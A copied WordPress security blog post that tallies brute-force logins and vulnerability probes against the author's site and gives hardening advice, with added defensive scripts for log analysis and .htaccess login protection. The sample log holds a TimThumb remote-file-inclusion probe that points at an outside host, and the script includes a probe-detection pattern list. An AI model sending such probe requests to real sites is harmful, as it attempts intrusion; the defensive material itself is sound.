Copy of article on WordPress security

11,000 attempted hacks in 4 months! How Safe Is Your WordPress?

Over the last 4 months I have noticed more than 11,000 (yes, eleven thousand) attempts to break into my blog. I have compiled a list of the methods these attackers used most often, together with some simple and effective tips on how to protect yourself against them. If you want to avoid unpleasant surprises, such as stills from a gay porn film on your front page, read on 🙂

Password guessing

The most common method the attackers used was simply trying to log into the admin panel without authorisation: more than 10,000 attempts in total.

Login form

Here are the ten usernames they tried most often, with the number of attempts for each:

1. admin 5158
2. Administrator 1232
3. wpsamurai 1175
4. adm 686
5. user 591
6. user2 524
7. Tester 429
8. test 379
9. support 350
10. админ 313

I hope everyone who has an account named admin has their skin crawling now 🙂 With a simple password, 5,000 attempts give a fairly good chance of success.

My second favourite, in terms of theoretical effectiveness, is the test account. Who sets a secure password when creating a test account? I bet the most common passwords are along the lines of 123 or 111. Unfortunately, I was not recording the passwords the attackers tried, but I’m working on it 🙂

The break-in attempts came from more than 2,000 different IP addresses from all over the world. The most active single address tried more than 900 times.

To guard against this kind of incident, simply avoid obvious account names and use strong passwords. Additionally, you can install one of the WordPress security plugins that locks out a client after several failed attempts. Here is an example of the settings for the Better WP Security plugin.

Protection against brute force attacks

After 10 failed login attempts against a specific account, or 5 failed attempts from a specific host, the login is locked for 15 minutes. In addition, you can enable a permanent ban of the IP address if the attempts keep repeating. Keep two limitations in mind: a per-host threshold does little against an attacker spread over 2,000 addresses, since each address gets its own allowance of attempts before it is blocked, and a per-account lockout lets an attacker deliberately lock the real administrator out by failing on purpose. A low account threshold therefore works best together with renaming the admin account and adding the extra authentication layer described in the tips below.

Exploiting vulnerabilities

Besides simple password guessing, there were more sophisticated attempts that exploited vulnerabilities in various themes and scripts.

Some went after TinyMCE (vulnerability description):

Some looked for the Akismet plugin (attack description):

The TimThumb script shipped with themes (vulnerability description):

phpThumb shipped with themes (vulnerability description):

Through a vulnerability in Themify:

This attempt was an interesting one 🙂

That one was clever 🙂 Admit it, who has such or similar files in their root directory? 🙂
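The attempts described above (login attempts per address, the per-host lockout threshold, and requests for the probed scripts) can all be pulled out of an ordinary web server access log. The script below is an added example and is not part of the original article: it runs four checks over a constructed "combined"-format log (the format Apache and nginx write by default). The log lines are made up for this example, and the probe path patterns are assumptions about where those components usually live, not the article's own data.

```shell
#!/bin/sh
# Added example, not from the original article: summarise brute-force and
# exploit-probe traffic against WordPress from a "combined" access log.
# Sample lines below are constructed; probe paths are assumptions.

SAMPLE_LOG="$(mktemp)"
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.10 - - [01/Mar/2013:10:00:01 +0100] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Mar/2013:10:00:02 +0100] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Mar/2013:10:00:03 +0100] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Mar/2013:10:00:04 +0100] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Mar/2013:10:00:05 +0100] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Mar/2013:10:00:06 +0100] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2013:10:01:00 +0100] "POST /wp-login.php HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2013:10:01:10 +0100] "GET /wp-content/themes/example/timthumb.php?src=http://203.0.113.99/x.php HTTP/1.1" 404 512 "-" "-"
192.0.2.33 - - [01/Mar/2013:10:02:00 +0100] "GET /wp-content/plugins/akismet/readme.txt HTTP/1.1" 200 1200 "-" "-"
192.0.2.33 - - [01/Mar/2013:10:02:01 +0100] "GET /wp-includes/js/tinymce/plugins/media/media.php HTTP/1.1" 404 512 "-" "-"
192.0.2.33 - - [01/Mar/2013:10:02:02 +0100] "GET /wp-content/themes/example/phpthumb/phpThumb.php?src=x HTTP/1.1" 404 512 "-" "-"
192.0.2.33 - - [01/Mar/2013:10:02:03 +0100] "GET /wp-login.php HTTP/1.1" 200 3512 "-" "-"
EOF

# Login POSTs per client address, most active first ("<count> <ip>" per line).
# A plain GET of wp-login.php is just the form being loaded and is not counted.
# Fields: $1 = client IP, $6 = "METHOD (with the opening quote), $7 = path, $9 = status.
login_attempts_by_ip() {
    awk '$6 == "\"POST" && $7 ~ /^\/wp-login\.php/ { n[$1]++ }
         END { for (ip in n) print n[ip], ip }' "$1" | sort -rn
}

# Addresses at or above a lockout threshold (default 5, the per-host value in the
# Better WP Security settings shown in the article).
ips_over_threshold() {
    login_attempts_by_ip "$1" | awk -v t="${2:-5}" '$1 >= t { print $2 }'
}

# Login POSTs answered with a redirect. WordPress shows the form again (200) after a
# failed login and answers a successful one with a 302 to the dashboard, so a 302
# following a burst of 200s from the same address is the line to worry about.
successful_logins() {
    awk '$6 == "\"POST" && $7 ~ /^\/wp-login\.php/ && $9 == "302" { print $1, $4 }' "$1"
}

# Requests for the scripts the article saw being probed. The pattern list is an
# assumption based on how those components are usually deployed.
probe_hits() {
    grep -iE 'timthumb\.php|phpthumb\.php|/tinymce/|/plugins/akismet/|themify' "$1"
}

echo "== login POSTs per address =="
login_attempts_by_ip "$SAMPLE_LOG"
echo "== addresses at or over the 5-attempt threshold =="
ips_over_threshold "$SAMPLE_LOG" 5
echo "== successful logins (check that these were yours) =="
successful_logins "$SAMPLE_LOG"
echo "== vulnerability probes =="
probe_hits "$SAMPLE_LOG"
```

Point the functions at your real log (for example `login_attempts_by_ip /var/log/apache2/access.log`) to reproduce the per-address counts the article quotes. The successful-login check is the one worth alerting on: a 302 after a run of 200s from the same address means a password was guessed, and the lockout plugin will not tell you that on its own.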

A few easy-to-use tips to increase your site’s security

To sum up, 99% of the attacks described above can be neutralised by following a few simple rules:

  1. Always update WordPress to the latest version (especially for security fixes). This is trivial and is repeated everywhere, yet many people still do not do it.
  2. Update plugins and themes to the latest versions.
  3. Use plugins and themes that are actively maintained. Think twice before installing anything from the WordPress repository that has not been updated for two years. The older the plugin, the greater the chance that it has a hole nobody has patched.
  4. A plugin or theme you no longer use can still be dangerous even when it is deactivated: its files stay on the server, and stand-alone scripts such as TimThumb can be requested directly without WordPress ever loading the plugin. Don’t use it? Uninstall it!
  5. Use strong passwords. A password such as admin123 is not strong 🙂 PasswordG1Twvnx54FlkVXglRXJN is much better 🙂
  6. If you have an account named admin, whether you use it or not, rename it! The Better WP Security plugin can do this for you. One simple change and half of the attempts have no chance of succeeding!
  7. Install a security plugin (e.g. Better WP Security), which will also tell you what else you can tighten.
  8. If you want to cut down the number of login-related attacks, add HTTP authentication for the login page in the .htaccess file. This eliminates password-guessing attempts in 99% of cases.

These are really simple tips to apply. There is nothing complicated here (well, maybe the last point requires a little more knowledge, but I will explain it in more detail soon 🙂
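The last tip, HTTP authentication in front of the login page, comes down to two files that Apache reads. The script below is an added example, not the article's own configuration or the follow-up the author promises: it writes an `.htpasswd` entry and an `.htaccess` block that protects `wp-login.php` only. The user name, password and file paths are placeholders, and the demonstration at the bottom runs against scratch directories rather than a real web root.

```shell
#!/bin/sh
# Added example, not from the original article: HTTP Basic authentication in front
# of wp-login.php via .htaccess, so a password guesser has to get through a second
# credential that WordPress itself never sees. Names and paths are placeholders.

# One .htpasswd line. "$apr1$" (Apache's MD5 variant) is accepted by every Apache
# version, and the openssl command line produces it without apache2-utils installed.
htpasswd_line() {
    printf '%s:%s\n' "$1" "$(openssl passwd -apr1 "$2")"
}

# The .htaccess rules. Limiting them to wp-login.php (rather than the whole
# wp-admin/ directory) keeps wp-admin/admin-ajax.php reachable, which front-end
# plugins and themes call on behalf of anonymous visitors.
htaccess_rules() {
    cat <<EOF
<Files wp-login.php>
    AuthType Basic
    AuthName "Restricted area"
    AuthUserFile $1
    Require valid-user
</Files>
EOF
}

# Write the credential file and append the rules to the site's .htaccess.
# The .htpasswd file must live where Apache can read it but does not serve it,
# which is why its location is a separate parameter and not derived from the web root.
install_login_auth() {
    webroot="$1"; htpasswd_file="$2"; user="$3"; password="$4"
    htpasswd_line "$user" "$password" > "$htpasswd_file"
    chmod 640 "$htpasswd_file"
    htaccess_rules "$htpasswd_file" >> "$webroot/.htaccess"
}

# Demonstration against scratch directories. On a real host WEBROOT is the
# WordPress directory and SECRETS is a directory outside it (e.g. /etc/apache2/wp).
WEBROOT="$(mktemp -d)"
SECRETS="$(mktemp -d)"
trap 'rm -rf "$WEBROOT" "$SECRETS"' EXIT
install_login_auth "$WEBROOT" "$SECRETS/.htpasswd" wpgate 'G1Twvnx54FlkVXglRXJN'
echo "== $WEBROOT/.htaccess =="
cat "$WEBROOT/.htaccess"
```

The browser will now ask for the `.htpasswd` credentials before the WordPress form appears, and the automated guessers, which post straight to `wp-login.php`, get a 401 instead. One caveat: `xmlrpc.php` also accepts a WordPress username and password (over XML-RPC) and is not covered by a `<Files wp-login.php>` block; if you do not use it, deny access to that file in the same way.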


If someone thinks their blog or website is too little known for anyone to try to break in, they are mistaken. The bots do not check whether you are well known; what matters to them is gaining access to yet another system and using it one way or another.

The animated GIF at the top of the page is an excerpt from the film Bruce Almighty.
